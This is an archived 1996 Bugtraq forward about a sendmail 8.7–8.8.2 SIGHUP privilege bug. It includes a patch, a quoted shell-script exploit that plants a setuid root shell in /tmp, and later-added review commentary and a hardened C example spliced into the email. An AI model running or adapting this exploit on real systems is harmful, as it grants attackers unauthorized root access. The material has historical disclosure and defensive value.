[3967] in bugtraq
BoS: Exploit for sendmail smtpd bug (ver. 8.7-8.8.2). (fwd)
daemon@ATHENA.MIT.EDU (Ryan P. Skadberg)
Sun Jan 26 13:45:37 1997
Date: Sat, 16 Nov 1996 12:07:34 -0500
Reply-To: skadberg@wicked.stigmata.org
From: "Ryan P. Skadberg" <skadberg@wicked.stigmata.org>
To: BUGTRAQ@netspace.org
Got this from BOS; both the patch and the exploit are here.
Skadz
-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_
> Huh. Yet another gaping hole, can you believe it? This is entirely
> platform-independent, and has not yet been fixed in 8.2.2. Here's
> the patch to fix it. This was done on 8.7.6; the line numbers may
> differ in other versions but the patch is the same.
>
> ------------------------------------------------------
> --- main.c.old Mon Sep 16 12:56:01 1996
> +++ main.c Fri Nov 15 23:56:48 1996
> @@ -1693,14 +1693,16 @@
> sighup()
> {
> #ifdef LOG
> if (LogLevel > 3)
> syslog(LOG_INFO, "restarting %s on signal", SaveArgv[0]);
> #endif
> releasesignal(SIGHUP);
> + (void) setgid(RealGid);
> + (void) setuid(RealUid);
> execv(SaveArgv[0], (ARGV_T) SaveArgv);
> #ifdef LOG
> if (LogLevel > 0)
> syslog(LOG_ALERT, "could not exec %s: %m", SaveArgv[0]);
> #endif
> exit(EX_OSFILE);
> }
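Review bot: the two added calls discard their return values (`(void) setgid(RealGid);` and `(void) setuid(RealUid);`), so if either fails the function still falls through to `execv(SaveArgv[0], (ARGV_T) SaveArgv)` holding the privileges it was trying to shed. Test each result and take an error path (a syslog under `#ifdef LOG` followed by `exit()`, as the existing failure branch already does) rather than exec'ing. Separately, the exec target is still `SaveArgv[0]`, i.e. whatever argv[0] the invoker supplied; dropping privileges first limits the consequence, but re-executing a fixed installed path instead of argv[0] would remove the caller-chosen path from the restart entirely.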
> ------------------------------------------------------
>
> Now who the heck do I send this to to get it back into sendmail? There
> are no e-mail addresses listed for bug reports in the READ_ME file, or
> anywhere else for that matter.
>
> cjs
>
> Curt Sampson cjs@portal.ca Info at http://www.portal.ca/
> Internet Portal Services, Inc.
> Vancouver, BC (604) 257-9400 De gustibus, aut bene aut nihil.
>
> On Sat, 16 Nov 1996, Leshka Zakharoff wrote:
>
> > Date: Sat, 16 Nov 1996 04:10:16 +0300 (MSK)
> > From: Leshka Zakharoff <leshka@leshka.chuvashia.su>
> > To: best-of-security@suburbia.net
> > Subject: BoS: Exploit for sendmail smtpd bug (ver. 8.7-8.8.2).
> > Resent-Date: Sat, 16 Nov 1996 17:32:01 +1100
> > Resent-From: best-of-security@suburbia.net
> >
> > #-------------------------------- CUT HERE -------------------------------------
> > #/bin/sh
> > #
> > #
> > # Hi !
> > # This is exploit for sendmail smtpd bug
> > # (ver. 8.7-8.8.2 for FreeBSD, Linux and may be other platforms).
> > # This shell script does a root shell in /tmp directory.
> > # If you have any problems with it, drop me a letter.
> > # Have fun !
> > #
> > #
> > # ----------------------
> > # ---------------------------------------------
> > # ----------------- Dedicated to my beautiful lady ------------------
> > # ---------------------------------------------
> > # ----------------------
> > #
> > # Leshka Zakharoff, 1996. E-mail: leshka@leshka.chuvashia.su
> > #
> > #
> > #
> > echo 'main() '>>leshka.c
> > echo '{ '>>leshka.c
> > echo ' execl("/usr/sbin/sendmail","/tmp/smtpd",0); '>>leshka.c
> > echo '} '>>leshka.c
> > #
> > #
> > echo 'main() '>>smtpd.c
> > echo '{ '>>smtpd.c
> > echo ' setuid(0); setgid(0); '>>smtpd.c
> > echo ' system("cp /bin/sh /tmp;chmod a=rsx /tmp/sh"); '>>smtpd.c
> > echo '} '>>smtpd.c
> > #
> > #
> > cc -o leshka leshka.c;cc -o /tmp/smtpd smtpd.c
> > ./leshka
> > kill -HUP `ps -ax|grep /tmp/smtpd|grep -v grep|tr -d ' '|tr -cs "[:digit:]" "\n"|head -n 1`
> > rm leshka.c leshka smtpd.c /tmp/smtpd
> > /tmp/sh
> > #-------------------------------- CUT HERE -------------------------------------
> >
> >
>
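The patch above fixes the SIGHUP restart by dropping to the real uid/gid before `execv()`. The following C program is an added example, not code from the forwarded patch, from sendmail, or from the exploit: it shows the same drop-privileges-then-re-exec pattern with the two hardenings a reviewer would ask for, namely checking the `setgid()`/`setuid()` return values (and re-reading the ids afterwards) and re-executing a fixed path rather than whatever argv[0] the invoker supplied. The function names and the `TRUSTED_SELF_PATH` constant are this example's own assumptions.

```c
/* Added example (not from the forwarded patch or exploit): a privilege-dropping
 * helper for a SIGHUP re-exec path. It illustrates the fix the patch makes to
 * sighup() with two hardenings the patch omits: the setgid()/setuid() return
 * values are checked, and the binary is re-executed from a fixed path instead
 * of the caller-controlled argv[0]. All names here are this example's own. */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/types.h>

/* Fixed re-exec path. Assumed value for illustration; a real daemon would use
 * its installed location, never the argv[0] it happened to be started with. */
#define TRUSTED_SELF_PATH "/usr/sbin/sendmail"

/* Drop to the real uid/gid that invoked the setuid binary. Order matters:
 * the group first (while still privileged), then the uid. Returns 0 only when
 * both calls succeeded and the kernel reports the requested identity. */
int drop_privileges(uid_t uid, gid_t gid)
{
    if (setgid(gid) != 0)
        return -1;
    if (setuid(uid) != 0)
        return -1;
    /* Confirm the change took effect on both real and effective ids. */
    if (getuid() != uid || geteuid() != uid ||
        getgid() != gid || getegid() != gid)
        return -1;
    return 0;
}

/* Decide whether an argv[0] may be used as a re-exec target: only the trusted
 * path itself qualifies. Returns 1 when acceptable, 0 for NULL, a relative
 * name, or any other file (such as a copy dropped in /tmp). */
int reexec_path_is_trusted(const char *argv0)
{
    if (argv0 == NULL || argv0[0] != '/')
        return 0;
    return strcmp(argv0, TRUSTED_SELF_PATH) == 0;
}

/* Re-exec ourselves the way the patched sighup() intends. Does not return on
 * success; returns -1 if privileges could not be dropped or execv() failed,
 * so the caller can log and exit instead of carrying on privileged. */
int reexec_self(char *const argv[], uid_t real_uid, gid_t real_gid)
{
    if (drop_privileges(real_uid, real_gid) != 0)
        return -1;
    /* argv[0] is not used as a path; the known binary is exec'd, while the
     * rest of the argument vector is kept so the restart sees its options. */
    execv(TRUSTED_SELF_PATH, argv);
    return -1;  /* execv() only returns on failure */
}

int main(void)
{
    /* Demonstration on the current identity: a process may always set its
     * uid/gid to its own real ids, so this succeeds even unprivileged. */
    int rc = drop_privileges(getuid(), getgid());
    printf("drop_privileges to own ids: %s\n", rc == 0 ? "ok" : "failed");
    printf("/tmp/smtpd trusted? %d\n", reexec_path_is_trusted("/tmp/smtpd"));
    printf("%s trusted? %d\n", TRUSTED_SELF_PATH,
           reexec_path_is_trusted(TRUSTED_SELF_PATH));
    return rc == 0 ? 0 : 1;
}
```

The `main()` only exercises the helpers on the running process's own ids; in a daemon the two values passed to `reexec_self()` would be the real uid/gid saved at startup, which is exactly what `RealUid`/`RealGid` are in the patch.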